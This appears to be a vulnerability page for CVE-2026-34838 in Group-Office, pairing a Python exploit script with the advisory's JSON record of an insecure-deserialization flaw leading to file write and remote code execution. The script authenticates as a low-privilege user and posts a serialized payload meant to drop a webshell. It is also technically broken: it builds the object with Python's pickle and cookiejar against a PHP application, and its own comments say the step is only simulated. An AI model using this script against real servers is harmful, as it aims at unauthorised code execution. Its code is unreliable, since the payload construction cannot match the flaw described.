CVE-2026-34838

import requests import pickle from http.cookiejar import FileCookieJar # Target configuration target_url = "http://target-group-office-url.com" username = "attacker" password = "password" login_endpoint = "/go.php/auth/login" settings_endpoint = "/go.php/settings/save" # 1. Authenticate as a low-privilege user session = requests.Session() login_data = {"username": username, "password": password} session.post(target_url + login_endpoint, data=login_data) # 2. Generate malicious payload (FileCookieJar object) # The goal is to leverage this object to write a file (e.g., webshell) # Note: Actual payload depends on the specific gadget chain in Group-Office malicious_jar = FileCookieJar("/var/www/html/group-office/rce.php") # In a real scenario, the jar content would be manipulated to contain PHP code # For demonstration purposes, we simulate the serialization process #攻击链：序列化恶意对象 -> 注入Settings -> 触发反序列化 -> 写入Webshell payload_data = pickle.dumps(malicious_jar) # 3. Inject payload into the vulnerable setting parameter exploit_data = { "setting_name": "AbstractSettingsCollection", "setting_value": payload_data # Injecting serialized object } # 4. Send the request to trigger the vulnerability response = session.post(target_url + settings_endpoint, data=exploit_data) if response.status_code == 200: print("[+] Payload sent successfully. Check for uploaded shell.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2026-34838", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:28.150", "lastModified": "2026-04-15T17:29:12.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.156, 25.0.90, and 26.0.12, a vulnerability in the AbstractSettingsCollection model leads to insecure deserialization when these settings are loaded. By injecting a serialized FileCookieJar object into a setting string, an authenticated attacker can achieve Arbitrary File Write, leading directly to Remote Code Execution (RCE) on the server. This issue has been patched in versions 6.8.156, 25.0.90, and 26.0.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.8.156", "matchCriteriaId": "58242448-BF4C-435F-8DAA-FC1F28CD181B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.0.1", "versionEndExcluding": "25.0.90", "matchCriteriaId": "1CA282F8-C073-4224-B3D0-5F1103FFE93F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0.1", "versionEndExcluding": "26.0.12", "matchCriteriaId": "903696F9-950E-4D3F-8F0B-613C6C599F98"}]}]}], "references": [{"url": "https://github.com/Intermesh/groupoffice/releases/tag/v25.0.90", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/releases/tag/v26.0.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/releases/tag/v6.8.156", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/security/advisories/GHSA-h22j-frrf-5vxq", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}